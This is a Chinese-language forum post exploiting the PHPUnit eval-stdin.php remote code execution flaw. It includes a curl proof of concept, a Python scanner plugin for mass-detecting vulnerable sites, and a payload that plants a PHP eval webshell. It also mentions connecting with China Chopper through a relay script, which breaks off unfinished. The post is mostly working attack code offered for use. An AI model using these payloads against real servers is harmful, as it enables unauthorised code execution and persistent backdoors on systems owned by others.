官网的poc可以私发么
漏洞详情: http://phpunit.vulnbusters.com
简单来说漏洞是出在phpunit,可以使用composer安装,vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
, 这个文件可以造成RCE:
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
影响版本: 4.8.19~4.8.27
或者5.0.10~5.6.2
漏洞的利用扫描
官网给了一个poc,照着POC写一个POC-T的扫描插件:
#!/usr/bin/env python
# -*-coding: utf-8 -*-
import requests
req_timeout = 10
def poc(url):
if '://' not in url:
url = 'http://' + url
targeturl = url.rstrip('/') + "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
try:
c = requests.post(targeturl, timeout=req_timeout, data="<?php echo(pi());")
if r'3.14' in c.content:
return url
except Exception, e:
pass
return False
I
写个shell或者菜刀中转脚本
写shell
因为直接是RCE,如果当前目录可写,直接POST这样的body: <?php file_put_contents("a.php", '<?php eval($_REQUEST[11]);?>');
即可在当前目录生成一个a.php
的shell。如果当前目录不可写,可以使用菜刀中转脚本。
菜刀中转脚本
使用20160622版本的菜刀,可以直接连目标,可以执行命令,但是不可以上传修改文件。
<?php
点击收藏 | 2
关注 | 1